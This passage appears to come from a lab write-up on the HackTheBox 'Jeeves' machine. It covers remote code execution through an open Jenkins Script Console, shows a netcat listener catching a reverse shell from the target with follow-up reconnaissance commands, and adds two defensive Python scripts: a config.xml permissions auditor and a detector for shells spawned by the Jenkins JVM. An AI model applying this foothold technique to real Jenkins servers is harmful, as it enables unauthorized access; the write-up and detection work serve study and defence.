Remote Code Execution


A Jetty instance on the target's port 50000 has been identified as hosting a Jenkins instance at the /askjeeves/ endpoint, which is likely the backend for the incomplete web application served by the web server on the target's port 80. A thorough examination of the Jenkins instance revealed that its global security configuration authorizes any user to perform any action, posing a notable risk of arbitrary code execution. This is particularly concerning because the Script Console endpoint, which executes Groovy scripts, is exposed.
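The global security setting described above is stored in Jenkins' own config.xml, so it can be audited offline. The following is an added example (not part of the original write-up and not Jenkins project code) that parses a constructed config.xml and reports who can reach the Script Console; the authorization strategy class names are the ones Jenkins writes, while the sample XML and the severity labels are assumptions made for the example.

```python
"""Audit Jenkins' global security settings from $JENKINS_HOME/config.xml.

Added example: the sample XML below is constructed to mirror the
"Anyone can do anything" setting, not copied from the target.
"""
import xml.etree.ElementTree as ET

# Constructed sample config.xml (assumption: mirrors the vulnerable setting).
SAMPLE_CONFIG = """<hudson>
  <useSecurity>true</useSecurity>
  <authorizationStrategy class="hudson.security.AuthorizationStrategy$Unsecured"/>
  <securityRealm class="hudson.security.HudsonPrivateSecurityRealm">
    <disableSignup>false</disableSignup>
  </securityRealm>
</hudson>
"""

UNSECURED = "hudson.security.AuthorizationStrategy$Unsecured"               # "Anyone can do anything"
LOGGED_IN = "hudson.security.FullControlOnceLoggedInAuthorizationStrategy"  # "Logged-in users can do anything"
MATRIX = {"hudson.security.GlobalMatrixAuthorizationStrategy",
          "hudson.security.ProjectMatrixAuthorizationStrategy"}
# Permissions that grant Script Console access (RunScripts was folded into
# Administer on newer cores, so both are checked).
SCRIPT_PERMS = {"hudson.model.Hudson.Administer", "hudson.model.Hudson.RunScripts"}


def audit_jenkins_config(xml_text):
    """Return [(severity, message)] describing who can run Groovy in /script."""
    root = ET.fromstring(xml_text)
    findings = []

    if (root.findtext("useSecurity") or "").strip().lower() != "true":
        return [("HIGH", "useSecurity is not true: Jenkins enforces no authentication, "
                         "so anyone can run Groovy in the Script Console")]

    strat = root.find("authorizationStrategy")
    cls = strat.get("class", "") if strat is not None else ""

    if not cls or cls == UNSECURED:
        findings.append(("HIGH", "authorization strategy is 'Anyone can do anything' (%s): "
                                 "anonymous users can run Groovy in /script"
                         % (cls or "no authorizationStrategy element")))
    elif cls == LOGGED_IN:
        realm = root.find("securityRealm")
        signup_off = (realm.findtext("disableSignup") if realm is not None else "") or ""
        if signup_off.strip().lower() != "true":
            findings.append(("HIGH", "'Logged-in users can do anything' with self-signup enabled: "
                                     "anyone can register an account and then use /script"))
        else:
            findings.append(("MEDIUM", "'Logged-in users can do anything': every account, not only "
                                       "administrators, can use the Script Console"))
    elif cls in MATRIX:
        for perm in strat.iterfind("permission"):
            parts = (perm.text or "").strip().split(":")
            if len(parts) < 2:
                continue
            # Handles both the old "perm:sid" and the newer "USER:perm:sid" form.
            permission, sid = parts[-2], parts[-1]
            if sid == "anonymous" and permission in SCRIPT_PERMS:
                findings.append(("HIGH", "matrix authorization grants %s to anonymous" % permission))
    else:
        findings.append(("INFO", "unrecognised authorization strategy %s; review it manually" % cls))
    return findings


if __name__ == "__main__":
    for severity, message in audit_jenkins_config(SAMPLE_CONFIG):
        print("[%s] %s" % (severity, message))
```

Point the script at a real `$JENKINS_HOME/config.xml` to audit an instance you administer; the fix for the "Anyone can do anything" finding is to switch to a matrix strategy that grants anonymous at most Overall/Read.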

The following sections demonstrate a PoC (Proof of Concept) for the vulnerability described above.

Executing the payload

┌──(kali㉿kali)-[~/archive/htb/labs/jeeves]
└─$ nnc 9999                                   
listening on [any] 9999 ...
connect to [10.10.16.8] from (UNKNOWN) [10.10.10.63] 49676
Microsoft Windows [Version 10.0.10586]
(c) 2015 Microsoft Corporation. All rights reserved.
 
c:\Users\Administrator\.jenkins>whoami
whoami
jeeves\kohsuke
 
c:\Users\Administrator\.jenkins>hostname
hostname
Jeeves
 
c:\Users\Administrator\.jenkins>ipconfig
ipconfig
 
Windows IP Configuration
 
 
ethernet adapter ethernet0:
 
   connection-specific dns suffix  . : 
   ipv4 address. . . . . . . . . . . : 10.10.10.63
   subnet mask . . . . . . . . . . . : 255.255.255.0
   default gateway . . . . . . . . . : 10.10.10.2
 
tunnel adapter isatap.{4079b648-26d5-4a56-9108-2a55ec5ce6ca}:
 
   media state . . . . . . . . . . . : Media disconnected
   connection-specific dns suffix  . : 

Initial foothold established on the target system as the kohsuke user via RCE.
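The session above shows the tell-tale artifact a defender can hunt for: a cmd.exe child of the Jenkins JVM whose working directory is JENKINS_HOME itself (c:\Users\Administrator\.jenkins) rather than a job workspace. The following is an added example, not from the original write-up, that runs that detection over a constructed process-creation log (Sysmon-style fields, pipe-separated); the JENKINS_HOME value is taken from the prompt above, while the Java path, the sample events and the assumption that legitimate build steps run a generated .bat inside a workspace are the example's own.

```python
"""Flag shells spawned by the Jenkins master JVM.

Added example: the log lines are constructed, not telemetry from the target.
"""
import ntpath

# Constructed sample log (not real telemetry).
# fields: parent_image|image|command_line|current_dir|user
SAMPLE_LOG = r"""
C:\Java\bin\java.exe|C:\Windows\System32\cmd.exe|cmd.exe|C:\Users\Administrator\.jenkins|JEEVES\kohsuke
C:\Java\bin\java.exe|C:\Windows\System32\cmd.exe|cmd /c call C:\Users\Administrator\.jenkins\workspace\nightly\hudson1234.bat|C:\Users\Administrator\.jenkins\workspace\nightly|JEEVES\kohsuke
C:\Windows\explorer.exe|C:\Windows\System32\notepad.exe|notepad.exe|C:\Users\kohsuke|JEEVES\kohsuke
C:\Java\bin\java.exe|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell.exe -NoProfile|C:\Users\Administrator\.jenkins|JEEVES\kohsuke
""".strip()

JENKINS_HOME = r"C:\Users\Administrator\.jenkins"   # working directory seen in the session above
JAVA = {"java.exe", "javaw.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}


def parse_log(text):
    """Turn the pipe-separated sample format into a list of event dicts."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        parent, image, cmdline, cwd, user = line.split("|", 4)
        events.append({"parent": parent, "image": image, "cmdline": cmdline,
                       "cwd": cwd, "user": user})
    return events


def _under(path, root):
    """True if path equals root or lies inside it (case-insensitive Windows paths)."""
    p = ntpath.normcase(ntpath.normpath(path))
    r = ntpath.normcase(ntpath.normpath(root))
    return p == r or p.startswith(r + ntpath.sep)


def classify(event):
    """Return None, or (severity, reason) when the Jenkins JVM spawned a shell."""
    if ntpath.basename(event["parent"]).lower() not in JAVA:
        return None
    if ntpath.basename(event["image"]).lower() not in SHELLS:
        return None
    workspace = ntpath.join(JENKINS_HOME, "workspace")
    # Assumption: a build-step shell runs a generated .bat inside a job
    # workspace; a shell started from the Script Console does neither.
    if _under(event["cwd"], workspace) and ".bat" in event["cmdline"].lower():
        return ("LOW", "build-step shell in workspace %s" % event["cwd"])
    return ("HIGH", "%s spawned by the Jenkins JVM outside any workspace (cwd %s) as %s"
            % (ntpath.basename(event["image"]), event["cwd"], event["user"]))


def flag_jenkins_shells(events):
    """Return [(index, severity, reason)] for every event worth an alert."""
    hits = []
    for i, ev in enumerate(events):
        result = classify(ev)
        if result:
            hits.append((i, result[0], result[1]))
    return hits


if __name__ == "__main__":
    for idx, sev, why in flag_jenkins_shells(parse_log(SAMPLE_LOG)):
        print("[%s] event %d: %s" % (sev, idx, why))
```

The same rule translates directly into a SIEM query (parent image is java.exe, child is a shell, current directory is not under JENKINS_HOME\workspace); the LOW tier keeps routine build steps visible without paging anyone.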